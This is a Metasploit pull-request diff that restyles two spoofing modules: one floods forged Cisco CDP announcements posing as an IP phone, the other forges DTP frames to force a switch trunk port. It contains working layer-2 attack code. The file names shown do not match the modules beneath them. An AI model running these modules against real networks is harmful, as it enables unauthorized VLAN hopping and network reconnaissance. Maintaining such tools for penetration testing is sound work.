Merge pull request rapid7#20145 from bcoles/rubocop-modules-auxiliary-spoof

modules/auxiliary/spoof: Resolve RuboCop violations

Author: smcintyre-r7

modules/auxiliary/spoof/arp/arp_poisoning.rb

@@ -7,47 +7,53 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Capture
 
   def initialize
-
     super(
-      'Name'        => 'Send Cisco Discovery Protocol (CDP) Packets',
+      'Name' => 'Send Cisco Discovery Protocol (CDP) Packets',
       'Description' => %q{
         This module sends Cisco Discovery Protocol (CDP) packets. Note that any responses
         to the CDP packets broadcast from this module will need to be analyzed with an
         external packet analysis tool, such as tcpdump or Wireshark in order to learn more
         about the Cisco switch and router environment.
       },
-      'Author'      => 'Fatih Ozavci', # viproy.com/fozavci
-      'License'     =>  MSF_LICENSE,
-      'References'  => [
+      'Author' => 'Fatih Ozavci', # viproy.com/fozavci
+      'License' => MSF_LICENSE,
+      'References' => [
         [ 'URL', 'https://en.wikipedia.org/wiki/CDP_Spoofing' ]
       ],
-      'Actions'     => [
+      'Actions' => [
         ['Spoof', { 'Description' => 'Sends CDP packets' }]
       ],
-      'DefaultAction' => 'Spoof'
+      'DefaultAction' => 'Spoof',
+      'Notes' => {
+        'Stability' => [OS_RESOURCE_LOSS],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
 
     register_options(
       [
-        OptString.new('SMAC', [false, "MAC Address for MAC Spoofing"]),
-        OptString.new('VTPDOMAIN', [false, "VTP Domain"]),
-        OptString.new('DEVICE_ID', [true, "Device ID (e.g. SIP00070EEA3156)", "SEP00070EEA3156"]),
-        OptString.new('PORT', [true, "The CDP 'sent through interface' value", "Port 1"]),
+        OptString.new('SMAC', [false, 'MAC address for MAC spoofing']),
+        OptString.new('VTPDOMAIN', [false, 'VTP Domain']),
+        OptString.new('DEVICE_ID', [true, 'Device ID (e.g. SIP00070EEA3156)', 'SEP00070EEA3156']),
+        OptString.new('PORT', [true, "The CDP 'sent through interface' value", 'Port 1']),
         # XXX: this is not currently implemented
-        #OptString.new('CAPABILITIES',   [false, "Capabilities of the device (e.g. Router, Host, Switch)", "Router"]),
-        OptString.new('PLATFORM', [true, "Platform of the device", "Cisco IP Phone 7975"]),
-        OptString.new('SOFTWARE', [true, "Software of the device", "SCCP75.9-3-1SR2-1S"]),
+        # OptString.new('CAPABILITIES',   [false, "Capabilities of the device (e.g. Router, Host, Switch)", "Router"]),
+        OptString.new('PLATFORM', [true, 'Platform of the device', 'Cisco IP Phone 7975']),
+        OptString.new('SOFTWARE', [true, 'Software of the device', 'SCCP75.9-3-1SR2-1S']),
         OptBool.new('FULL_DUPLEX', [true, 'True iff full-duplex, false otherwise', true])
-      ])
+      ]
+    )
 
     deregister_options('FILTER', 'PCAPFILE', 'RHOST', 'SNAPLEN', 'TIMEOUT')
   end
 
   def setup
     check_pcaprub_loaded
     unless smac
-      fail ArgumentError, "Unable to get SMAC from #{interface} -- Set INTERFACE or SMAC"
+      raise ArgumentError, "Unable to get SMAC from #{interface} -- Set INTERFACE or SMAC"
     end
+
     open_pcap
     close_pcap
   end
@@ -61,19 +67,17 @@ def smac
   end
 
   def run
-    begin
-      open_pcap
-
-      @run = true
-      cdp_packet = build_cdp
-      print_status("Sending CDP messages on #{interface}")
-      while @run
-        capture.inject(cdp_packet)
-        Rex.sleep(60)
-      end
-    ensure
-      close_pcap
+    open_pcap
+
+    @run = true
+    cdp_packet = build_cdp
+    print_status("Sending CDP messages on #{interface}")
+    while @run
+      capture.inject(cdp_packet)
+      Rex.sleep(60)
     end
+  ensure
+    close_pcap
   end
 
   def build_cdp
@@ -106,7 +110,7 @@ def build_cdp
     # VTP management domain
     cdp << tlv(9, datastore['VTPDOMAIN']) if datastore['VTPDOMAIN']
     # random 1000-7000 power consumption in mW
-    cdp << tlv(0x10, [1000 + rand(6000)].pack('n'))
+    cdp << tlv(0x10, [rand(1000..6999)].pack('n'))
     # duplex
     cdp << tlv(0x0b, datastore['FULL_DUPLEX'] ? "\x01" : "\x00")
     # VLAn query.  TODO: figure out this field, use tlv, make configurable
@@ -117,7 +121,7 @@ def build_cdp
 
     # Build and return the final packet, which is 802.3 + LLC + CDP.
     # 802.3
-    PacketFu::EthHeader.mac2str("01:00:0C:CC:CC:CC") +
+    PacketFu::EthHeader.mac2str('01:00:0C:CC:CC:CC') +
       PacketFu::EthHeader.mac2str(smac) +
       [cdp.length + 8].pack('n') +
       # LLC
@@ -126,8 +130,8 @@ def build_cdp
       cdp
   end
 
-  def tlv(t, v)
-    [ t, v.length + 4 ].pack("nn") + v
+  def tlv(type, value)
+    [ type, value.length + 4 ].pack('nn') + value
   end
 
   def compute_cdp_checksum(cdp)
@@ -143,6 +147,6 @@ def compute_cdp_checksum(cdp)
     checksum += cdp[cdp.length - 1].getbyte(0) << 8 if remaining == 1
     checksum = (checksum >> 16) + (checksum & 0xffff)
     checksum = ~((checksum >> 16) + checksum) & 0xffff
-    ([checksum].pack("S*")).unpack("n*")[0]
+    [checksum].pack('S*').unpack('n*')[0]
   end
 end

modules/auxiliary/spoof/cisco/cdp.rb

@@ -6,25 +6,30 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::Capture
 
-  def initialize(info = {})
+  def initialize(_info = {})
     super(
-      'Name'        => 'Forge Cisco DTP Packets',
+      'Name' => 'Forge Cisco DTP Packets',
       'Description'	=> %q{
         This module forges DTP packets to initialize a trunk port.
       },
-      'Author'		=> [ 'Spencer McIntyre' ],
-      'License'		=> MSF_LICENSE,
-      'Actions'     =>
-        [
-          [ 'Service', 'Description' => 'Run DTP forging service' ]
-        ],
+      'Author'	=> [ 'Spencer McIntyre' ],
+      'License'	=> MSF_LICENSE,
+      'Actions' => [
+        [ 'Service', { 'Description' => 'Run DTP forging service' } ]
+      ],
       'PassiveActions' => [ 'Service' ],
-      'DefaultAction'  => 'Service'
+      'DefaultAction' => 'Service',
+      'Notes' => {
+        'Stability' => [OS_RESOURCE_LOSS],
+        'SideEffects' => [IOC_IN_LOGS],
+        'Reliability' => []
+      }
     )
     register_options(
       [
-        OptString.new('SMAC',    	[false, 'The spoofed mac (if unset, derived from netifaces)']),
-      ])
+        OptString.new('SMAC',	[false, 'The spoofed mac (if unset, derived from netifaces)']),
+      ]
+    )
     deregister_options('RHOST', 'PCAPFILE')
   end
 
@@ -40,11 +45,11 @@ def build_dtp_frame
     p.eth_daddr = '01:00:0c:cc:cc:cc'
     p.eth_saddr = smac
     llc_hdr =	"\xaa\xaa\x03\x00\x00\x0c\x20\x04"
-    dtp_hdr =	"\x01"								# version
-    dtp_hdr <<	"\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"		# domain
+    dtp_hdr =	"\x01"	# version
+    dtp_hdr <<	"\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"	# domain
     dtp_hdr <<	"\x00\x02\x00\x05\x03"						# status
     dtp_hdr <<	"\x00\x03\x00\x05\x45"						# dtp type
-    dtp_hdr <<	"\x00\x04\x00\x0a" << PacketFu::EthHeader.mac2str(smac)		# neighbor
+    dtp_hdr <<	"\x00\x04\x00\x0a" << PacketFu::EthHeader.mac2str(smac)	# neighbor
     p.eth_proto = llc_hdr.length + dtp_hdr.length
     p.payload = llc_hdr << dtp_hdr
     p
@@ -61,23 +66,27 @@ def smac
   end
 
   def run
-    unless smac()
-      print_error 'Source MAC (SMAC) should be defined'
-    else
-      unless is_mac? smac
-        print_error "Source MAC (SMAC) `#{smac}' is badly formatted."
-      else
-        print_status "Starting DTP spoofing service..."
-        open_pcap({'FILTER' => "ether host 01:00:0c:cc:cc:cc"})
-        interface = datastore['INTERFACE'] || Pcap.lookupdev
-        dtp = build_dtp_frame()
-        @run = true
-        while @run
-          capture.inject(dtp.to_s)
-          select(nil, nil, nil, 60)
-        end
-        close_pcap
-      end
+    unless smac
+      print_error('Source MAC (SMAC) should be defined')
+      return
+    end
+
+    unless is_mac?(smac)
+      print_error("Source MAC (SMAC) `#{smac}' is badly formatted.")
+      return
     end
+
+    print_status 'Starting DTP spoofing service...'
+    open_pcap({ 'FILTER' => 'ether host 01:00:0c:cc:cc:cc' })
+    datastore['INTERFACE'] || Pcap.lookupdev
+    dtp = build_dtp_frame
+    @run = true
+
+    while @run
+      capture.inject(dtp.to_s)
+      select(nil, nil, nil, 60)
+    end
+
+    close_pcap
   end
 end